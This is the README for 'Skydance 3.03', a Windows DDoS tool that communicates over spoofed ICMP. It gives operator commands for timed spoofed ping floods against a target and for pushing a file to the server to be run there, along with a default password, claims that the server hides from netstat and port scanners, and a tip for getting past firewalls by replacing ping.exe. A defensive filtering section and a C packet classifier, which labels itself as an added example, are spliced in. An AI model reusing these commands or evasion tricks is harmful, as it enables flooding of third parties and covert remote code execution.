This is - Skydance 3.03 - by Edrin@gmx.net !
http://skd.box.sk

Disclaimer:
	Everything in this document is based on the results I got from developing Skydance.
	Skydance 3.03 is an EXAMPLE of a Distributed Denial of Service attack!
	Use SKYDANCE 3.03 SOURCE AND README AT YOUR OWN RISK, I will NEVER be
	responsible for any HARM or harmful things that happen because SKYDANCE
	source was USED! That means I do NOT guarantee any features or
	security-things, and I do not guarantee that this program works properly!!!
	Indeed I guarantee nothing ;)
	Use this source only to learn about how to defend against Windows DDoS!

	suggestions against SKD303DDoS: goto ---> 4. d)

#tested only with win98 and win2k
------------------------------------------------------------------------------------------------------

Many thanks to everyone who helped me develop and test Skydance

and friendly hello to Matt, BinaryZer0, Cube, space tiger, orcist and Marvin

------------------------------------------------------------------------------------------------------
if you compile it "as it is" without changes:
#######################################
#Note: for skd303s.exe <pass> = nerv  #
#######################################

	1. What is Skydance 3?
	2. client usage:
	3. About the source code:
	4. How to filter SKD303DDoS pongs
	5. ICMP "ability" of win32 winsock (Icmps you can recv)
	6. Some words about DDoS servers that use Windows OS.


1. What is Skydance 3?

	Skydance 3.03 is a DDoS for win32 using RAW sockets.
	source includes the following features:
	- communication with ICMP, including a simple std-windows-"abcd..." ping attack
	- can not be found with netstat -a (ICMP:)
	- can not be found with usual Port-Scanners (RAW:) 
	- on win2k-systems communication and attacks are spoofed (IP_HDRINCL:) 
	- server size can be packed to 17 KB
	- client-source can be ported to unix because it is done as console app and does not make use
	  of high-level windows api functions.
	- (ICMP tunnel) file(<65kb) can be sent within a spoofed ICMP packet, which is executed after receive.

2. client usage:

	Usage:
	The Client will try to use a spoofed source address. You should test your
	spoofing-ability first to ensure that you can not be revealed. The test
	will fail on WinNT and Win9x/Me systems. It should not fail under Win2000.

	<spoofed-IP> and <target> must be in style of xxx.xxx.xxx.xxx
	By default the spoofed-IP is 216.32.74.55 = www.yahoo.com
	<pass> must be <= 4 letters!

	- To test spoofing-ability:
	   skd303c spoofing
	
	- Get Server Info (always unspoofed packets!):
	   skd303c <server> <pass> info
	   Example: skd303c myknight.com diva info
	
	- To attack with spoofed standard-windows-pings:
	   skd303c <server> <pass> kill <target> <time-in-minutes> <spoofed-IP>
	   Example: skd303c myknight.com diva kill 166.166.166.166 10 12.34.56.78
	   <time-in-minutes> can be up to 1440

	- To send and execute a file with a spoofed standard-windows-pong:
	   skd303c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP>
	   Example: skd303c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32
	   <file-name> SIZE can be up to 6540 byte, <new-filename> can have up to 39 letters

	DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA!

	greetings, Edrin

3. About source code:

	why this source needed to be modified to abuse it:

	first of all: it is not possible to receive ICMP_ECHOREQUESTS
	with winsock ( -> 5.) so I decided to use ICMP_ECHORESPONSE in my
	source, you can simply modify it...

	next thing: communication pong should have std unix ping size...
	(check it, I'm not sure about it... 84 byte in total? (IP header 20 + ICMP 64))

	the std-windows pings are the only attack I added and
	a simple firewall would stop an attack because size of
	this std windows ping is 
	#define STANDART_PINGSIZE 60 (byte)
	There are other DoS that are better. Anyway my win2k 
	550 MHz had 100% CPU usage in a 10 MBit local net.

	In addition to that the info function should also return
	the OS version, so it's possible to find out whether the server is 
	"spoofable" or not.

	Another lack of Skydance 3 is: I didn't encrypt the 
	unsigned char cCommand;	(the command in my message-struct)
	so a sniffer would always see a k(kill), i(info) or f(file)
	at position FULL_PACKET[35 ?]
	anyway, you could use ...the first password letter... +/- xy for
	a "crypted" command. in general there is no crypto built
	in (in my opinion a crypto in a DDoS is not really necessary)
	in addition to that there is no self installing procedure built in

	And there is no self installing code in my source... blah blah

4. How to filter SKD303DDoS pongs
	As I already mentioned:
	In communication pongs:

	a) communication with unix 84-byte PONGS ! ICMP_ECHORESPONSE
	b) 'k', 'i', 'f' at position FULL_PACKET[35] or ICMP_STRUCT[15] (IPheader = 20 byte)
	c) pongs are UNSPOOFED! so trace back is possible!
---->>	d) block each strange "ok-ICMP" in ( -> 5.) ??
	
	I don't have any other ideas, do you?
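
Filter criteria a), b) and d) above, written as a packet classifier for a defender's sensor. This is an added example, not part of the Skydance source: the names classify, make_sample and the verdict values are made up here, the sample packet is constructed, and the 64-byte ICMP length and offset 15 are taken from this README, which itself marks them as unverified.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { V_PASS, V_ODD_TYPE, V_SKD_LIKE };
#define SKD_ICMP_LEN 64  /* section 4 a): 84 bytes total = 20 IP + 64 ICMP */
#define SKD_CMD_OFF  15  /* section 4 b): ICMP_STRUCT[15] == FULL_PACKET[35] */

/* Section 5 "ok" rows: ICMP types a win32 raw socket was seen to receive. */
static int winsock_receivable(uint8_t t)
{
    return t <= 2 || t == 6 || t == 7 || t == 9 || t == 10 ||
           (t >= 14 && t <= 16) || (t >= 18 && t <= 20) ||
           (t >= 29 && t <= 41) || t == 255;
}

/* Classify one raw IPv4 packet; p points at the IP header. */
enum verdict classify(const uint8_t *p, size_t len)
{
    if (len < 20 || (p[0] >> 4) != 4) return V_PASS;
    size_t ihl = (size_t)(p[0] & 0x0f) * 4;
    size_t total = ((size_t)p[2] << 8) | p[3];
    if (ihl < 20 || total > len || total < ihl + 8) return V_PASS; /* malformed */
    /* Skip non-ICMP packets and later fragments (no ICMP header in them). */
    if (p[9] != 1 || (((p[6] & 0x1f) << 8) | p[7]) != 0) return V_PASS;
    const uint8_t *icmp = p + ihl;
    /* Criteria a) + b): echo reply, 64 bytes of ICMP, command letter at 15. */
    uint8_t c = (icmp[0] == 0 && total - ihl == SKD_ICMP_LEN) ? icmp[SKD_CMD_OFF] : 0;
    if (c == 'k' || c == 'i' || c == 'f') return V_SKD_LIKE;
    /* Criterion d): any other type from the "ok" list is worth a look. */
    if (icmp[0] != 0 && winsock_receivable(icmp[0])) return V_ODD_TYPE;
    return V_PASS;
}

/* Constructed sample: 20-byte IP header plus icmp_len (>= 1) bytes of ICMP. */
size_t make_sample(uint8_t *buf, uint8_t type, size_t icmp_len, uint8_t cmd)
{
    size_t total = 20 + icmp_len;
    memset(buf, 0, total);
    buf[0] = 0x45; buf[9] = 1;                 /* IPv4, IHL 5, protocol ICMP */
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[20] = type;
    if (icmp_len > SKD_CMD_OFF) buf[20 + SKD_CMD_OFF] = cmd;
    return total;
}

int main(void)
{
    uint8_t b[128];
    size_t n = make_sample(b, 0, SKD_ICMP_LEN, 'k');
    printf("verdict=%d\n", (int)classify(b, n));
}
```

A V_SKD_LIKE verdict is an indicator rather than proof; since criterion c) says the pongs are unspoofed, the source address of a flagged packet is where a trace back starts. Which V_ODD_TYPE types to actually block is a policy choice, because the section 5 list also contains types such as router advertisement and solicitation.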

5. ICMP "ability" of win32 winsock (Icmps you can recv)
	I tested it in a few minutes, no warranty, prove it yourself!

	0 Echo reply. 				ok
	1 Reserved. 				ok
	2 Reserved. 				ok
	3 Destination unreachable. 		failed
	4 Source quench. 			failed
	5 Redirect. 				failed
	6 Alternate Host Address. 		ok
	7  					ok
	8 Echo request. 			failed	(this "would" be nice to receive)
	9 Router advertisement. 		ok
	10 Router solicitation. 		ok
	11 Time exceeded. 			failed
	12 Parameter problem. 			failed
	13 Timestamp request. 			failed
	14 Timestamp reply. 			ok
	15 Information request. 		ok
	16 Information reply. 			ok
	17 Address mask request. 		failed
	18 Address mask reply. 			ok
	19 Reserved (for security). 		ok
	20					ok
	-					  unknown
	29 Reserved (for robustness experiment). ok
	30 Traceroute. 				ok
	31 Conversion error. 			ok
	32 Mobile Host Redirect. 		ok
	33 IPv6 Where-Are-You. 			ok
	34 IPv6 I-Am-Here. 			ok
	35 Mobile Registration Request. 	ok
	36 Mobile Registration Reply. 		ok
	37 Domain Name request. 		ok
	38 Domain Name reply. 			ok
	39 SKIP Algorithm Discovery Protocol. 	ok
	40 Photuris, Security failures. 	ok
	41					ok
	-					  unknown
	255 Reserved. 				ok

6. Some words about DDoS from Windows OS.
	The new feature IP_HDRINCL that comes with win2k can turn Windows into a powerful
	DDoS server because it enables IP-spoofing!

	THE IP_HDRINCL
	setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));

	That means win2k-servers can become a base for DDoS that is equal to Unix servers.

	Anyway most windows systems remain dial-in computers that have dynamic IP. That means
	such a DDoS as SKD3.03 can not be used with it in a serious way. I think for such
	Computers the most threatening DDoS remains IRC-"bots" because you can not simply
	disable an IRC server...

	Firewalls that control each winsock access are quite good. They would probably detect
	a DDoS server. Anyway: Maybe you can replace ping.exe with a DDoS and maybe the firewall does not
	detect a DDoS then...


Thx for reading,
Edrin@gmx.net